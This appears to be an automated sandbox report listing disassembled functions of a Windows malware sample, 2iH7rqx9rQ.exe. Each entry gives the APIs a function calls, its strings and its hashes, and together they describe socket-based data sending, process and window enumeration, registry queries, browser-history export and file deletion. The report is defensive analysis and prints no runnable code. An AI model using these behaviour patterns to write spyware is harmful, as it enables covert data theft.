API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9

Function 024BE3A2 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 024BE3AB
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 024BE3CE

Part of subcall function 024B6D66: RtlAllocateHeap.NTDLL(00000000,024A468A,?), ref: 024B6D98

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 024BE3F4
_free.LIBCMT ref: 024BE407
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 024BE416

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
Instruction ID: 7e0ce8b08ff842ce1582d840da6ff6f860909b06739041d4580fd5a9981ed37b
Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
Instruction Fuzzy Hash: 80017C627057257B27221ABB6C8CCFB6E6DDECAEA5355013AFD04C2206EA618C02D5B1

Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
_free.LIBCMT ref: 00446F7D
_free.LIBCMT ref: 00446FA4
SetLastError.KERNEL32(00000000), ref: 00446FB1
SetLastError.KERNEL32(00000000), ref: 00446FBA

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F

Function 024B71AA Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,024AAA29,00000000,?,?,024AAAAD,00000000,00000000,00000000,00000000,00000000,00000000,02472E6F,?), ref: 024B71AF
_free.LIBCMT ref: 024B71E4
_free.LIBCMT ref: 024B720B
SetLastError.KERNEL32(00000000), ref: 024B7218
SetLastError.KERNEL32(00000000), ref: 024B7221

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
Instruction ID: ae7832eedce52df3f557a566faf7c9e3a6144d847c7cbc3599666bc4568836a8
Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
Instruction Fuzzy Hash: 9C01F4375047006BCA1726366C44AEF6A6EDFC17B1B25043BF919A6395EF31C8428534

Function 0041B37D Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpen$FileImageName
String ID:
API String ID: 2951400881-0
Opcode ID: c0234a0b20aec694c86ab35c4c667d2525b298194358cea672627bcc3315ec17
Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
Opcode Fuzzy Hash: c0234a0b20aec694c86ab35c4c667d2525b298194358cea672627bcc3315ec17
Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE

Function 0248B5E4 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0248B5FC
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0248B60F
GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0248B62F
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0248B63A
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0248B642

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpen$FileImageName
String ID:
API String ID: 2951400881-0
Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
Instruction ID: 1fa23bfdf12a7163301282f30ce9c8d7ec20647e9d78987ff1dd843b7c5f1e7f
Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
Instruction Fuzzy Hash: 7AF0F4712142156FE7117754AC4AFBFB26CDB84F9AF000077F626E22A1EFB0CC814A66

Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F7B5

Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED

_free.LIBCMT ref: 0044F7C7
_free.LIBCMT ref: 0044F7D9
_free.LIBCMT ref: 0044F7EB
_free.LIBCMT ref: 0044F7FD

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C

Function 024BFA04 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024BFA1C

Part of subcall function 024B6D2C: HeapFree.KERNEL32(00000000,00000000,?,024BFCB7,?,00000000,?,00000000,?,024BFF5B,?,00000007,?,?,024C046C,?), ref: 024B6D42
Part of subcall function 024B6D2C: GetLastError.KERNEL32(?,?,024BFCB7,?,00000000,?,00000000,?,024BFF5B,?,00000007,?,?,024C046C,?,?), ref: 024B6D54

_free.LIBCMT ref: 024BFA2E
_free.LIBCMT ref: 024BFA40
_free.LIBCMT ref: 024BFA52
_free.LIBCMT ref: 024BFA64

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
Instruction ID: b38e5b0b39d5fd678fe797c48d98a090255dc8b0352555303ba398b8f0efe35b
Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
Instruction Fuzzy Hash: 3DF04F32505204AB9A66DB6AE880C8777EEEE05714B96180AF00CD7A60C732FC80CA74

Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00443305

Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED

_free.LIBCMT ref: 00443317
_free.LIBCMT ref: 0044332A
_free.LIBCMT ref: 0044333B
_free.LIBCMT ref: 0044334C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E

Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,?), ref: 00416768
GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
IsWindowVisible.USER32(?), ref: 004167A1

Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8

Strings

(FG, xrefs: 0041692A

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ProcessWindow$Open$TextThreadVisible
String ID: (FG
API String ID: 3142014140-2273637114
Opcode ID: 0dd98140505aabde013037891bd103b2e5d02dc1d4f96732bc3a2607dbdbbd40
Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
Opcode Fuzzy Hash: 0dd98140505aabde013037891bd103b2e5d02dc1d4f96732bc3a2607dbdbbd40
Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A

Function 024869B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,?), ref: 024869CF
GetWindowTextW.USER32(?,?,0000012C), ref: 02486A01
IsWindowVisible.USER32(?), ref: 02486A08

Part of subcall function 0248B5E4: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0248B5FC
Part of subcall function 0248B5E4: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0248B60F

Strings

(FG, xrefs: 02486B91

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ProcessWindow$Open$TextThreadVisible
String ID: (FG
API String ID: 3142014140-2273637114
Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
Instruction ID: badf585674e964bb927d85fc0f1d63448402207f6e706ca2692670befb51988f
Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
Instruction Fuzzy Hash: D371F4711182418FC376FB62D860AEF73A6FF94300F50496ED99A521A4EF706A49CF52

Function 02482C11 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 02482C84
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 02482CB3
RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 02482D54

Strings

DG, xrefs: 02482D96

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: DG
API String ID: 3554306468-2560412334
Opcode ID: bddf4943656ecba2bd9c39908ecfff909f44732c8dc369bfccc853cd4406e952
Instruction ID: f3268922b95567b3311f1042f34e12e045b4c675ec3b9bb9b28d17f3f809a8e0
Opcode Fuzzy Hash: bddf4943656ecba2bd9c39908ecfff909f44732c8dc369bfccc853cd4406e952
Instruction Fuzzy Hash: 8651FB72118345AFD351EB61D840EEFB7EDFF84740F40492EBA9692150EB74EA09CB62

Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044D4A8
_free.LIBCMT ref: 0044D5C5

Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,00401962,?,?,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F

Strings

*?, xrefs: 0044D49C
., xrefs: 0044D77C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54

Function 024BD6C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 024BD70F
_free.LIBCMT ref: 024BD82C

Part of subcall function 024AAABB: IsProcessorFeaturePresent.KERNEL32(00000017,024AAA8D,?,?,02471BC9,?,?,00000000,?,?,024AAAAD,00000000,00000000,00000000,00000000,00000000), ref: 024AAABD
Part of subcall function 024AAABB: GetCurrentProcess.KERNEL32(C0000417), ref: 024AAADF
Part of subcall function 024AAABB: TerminateProcess.KERNEL32(00000000), ref: 024AAAE6

Strings

*?, xrefs: 024BD703
., xrefs: 024BD9E3

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
Instruction ID: b4bdef26af4171a6ee7e587684adfdc0dff6ad92c97fa215207bd86640dde138
Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
Instruction Fuzzy Hash: 1F516E75E00119EFDF15DFA9C880AEEBBB5EF48714F2481AAD854E7340E7759A01CB60

Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 00409601

Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212

Part of subcall function 0040428C: connect.WS2_32(00000000,?,?), ref: 004042A5

Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

Strings

`AG, xrefs: 00409676
>G, xrefs: 00409657
XCG, xrefs: 0040962C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsendsocket
String ID: XCG$`AG$>G
API String ID: 2334542088-2372832151
Opcode ID: 3ca5f1b9d23d974abb066b0fc2472e24824cb7f54d0746cd215840d3b151923e
Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
Opcode Fuzzy Hash: 3ca5f1b9d23d974abb066b0fc2472e24824cb7f54d0746cd215840d3b151923e
Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A

Function 0247983D Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 02479868

Part of subcall function 02474458: socket.WS2_32(00000000,00000001,00000006), ref: 02474479

Part of subcall function 024744F3: connect.WS2_32(?,00000000,00000000), ref: 0247450C

Part of subcall function 0248B911: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,024798F0,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0248B926

Part of subcall function 024746CF: send.WS2_32(?,00000000,00000000,00000000), ref: 02474764

Strings

XCG, xrefs: 02479893
>G, xrefs: 024798BE
`AG, xrefs: 024798DD

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsendsocket
String ID: XCG$`AG$>G
API String ID: 2334542088-2372832151
Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
Instruction ID: ab47b4a737243655717e2080dadedc6f0b044cad3d878bb6adb0db254c984ed3
Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
Instruction Fuzzy Hash: 455111312482405FC36AF736D860AEF73E6FF94300F50492FE95A97291EE709A4ACE55

Function 024744F3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,00000000,00000000), ref: 0247450C
WSAGetLastError.WS2_32(?,?,?,02471B92), ref: 0247464E

Part of subcall function 0248A8ED: GetLocalTime.KERNEL32(00000000), ref: 0248A907

Strings

Connection Failed: , xrefs: 02474673
TLS Handshake... | , xrefs: 02474530

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLastLocalTimeconnect
String ID: Connection Failed: $TLS Handshake... |
API String ID: 227477821-1510355367
Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
Instruction ID: 706f72cde3d60e0eead8dd8cd2aaafc5664a02d071b8006d2e151fb039604c1c
Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
Instruction Fuzzy Hash: 8E412671B10601BB8B14B77E88066BE7A67EB41740F40015FD92247B91FE95A8A88FE7

Function 004426D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\2iH7rqx9rQ.exe,00000104), ref: 00442714
_free.LIBCMT ref: 004427DF
_free.LIBCMT ref: 004427E9

Strings

C:\Users\user\Desktop\2iH7rqx9rQ.exe, xrefs: 0044270B, 00442712, 00442741, 00442779

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\2iH7rqx9rQ.exe
API String ID: 2506810119-3168180111
Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59

Function 024B293B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\2iH7rqx9rQ.exe,00000104), ref: 024B297B
_free.LIBCMT ref: 024B2A46
_free.LIBCMT ref: 024B2A50

Strings

C:\Users\user\Desktop\2iH7rqx9rQ.exe, xrefs: 024B2972, 024B2979, 024B29A8, 024B29E0

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\2iH7rqx9rQ.exe
API String ID: 2506810119-3168180111
Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
Instruction ID: 1aaff6eceeec295880e94bbeced70209960203a66d3f153a5db98bff6cc801e2
Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
Instruction Fuzzy Hash: 2F314571A05218AFDB22DF99DD849DFBBFDEF8A350B10406BED0597214D7B05A81CB60

Function 02486863 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,0046559C,0046BA00,00000000,00000000,00000000), ref: 024868C3

Part of subcall function 0248B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02473D5A,00465324), ref: 0248B89A

Sleep.KERNEL32(00000064), ref: 024868EF
DeleteFileW.KERNEL32(00000000), ref: 02486923

Strings

/t , xrefs: 024868A2

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t
API String ID: 1462127192-3161277685
Opcode ID: bb2c0f94cc430c17f8d99c3ea8886f75899e052070629971ff6dc793af8fbd9b
Instruction ID: e32e9c13843826be7ec06a12fa681fa781608844658d250887901adbeddb80d8
Opcode Fuzzy Hash: bb2c0f94cc430c17f8d99c3ea8886f75899e052070629971ff6dc793af8fbd9b
Instruction Fuzzy Hash: F03141319101199ADB18FBA2DC91EEE773AEF10304F40406FE916731D0EFA05A8ACE95

Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A

Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00475B70,00000001,?), ref: 0041AB5F

Part of subcall function 004176B6: CloseHandle.KERNEL32(00401913,00000000,00000000,00401913), ref: 004176CC
Part of subcall function 004176B6: CloseHandle.KERNEL32(?), ref: 004176D5

Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00475B70,00473D54,?,00000000,00411F7E,00465324,00465324,00465324,00401703), ref: 0041B633

Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC

Strings

/sort "Visit Time" /stext ", xrefs: 00403A76
8>G, xrefs: 00403A5B

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$8>G
API String ID: 368326130-2663660666
Opcode ID: 3f911bf6e71d797fa9fc9d937a80e468ac3813f1e04c912b3fb1fe1a7504cab9
Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
Opcode Fuzzy Hash: 3f911bf6e71d797fa9fc9d937a80e468ac3813f1e04c912b3fb1fe1a7504cab9
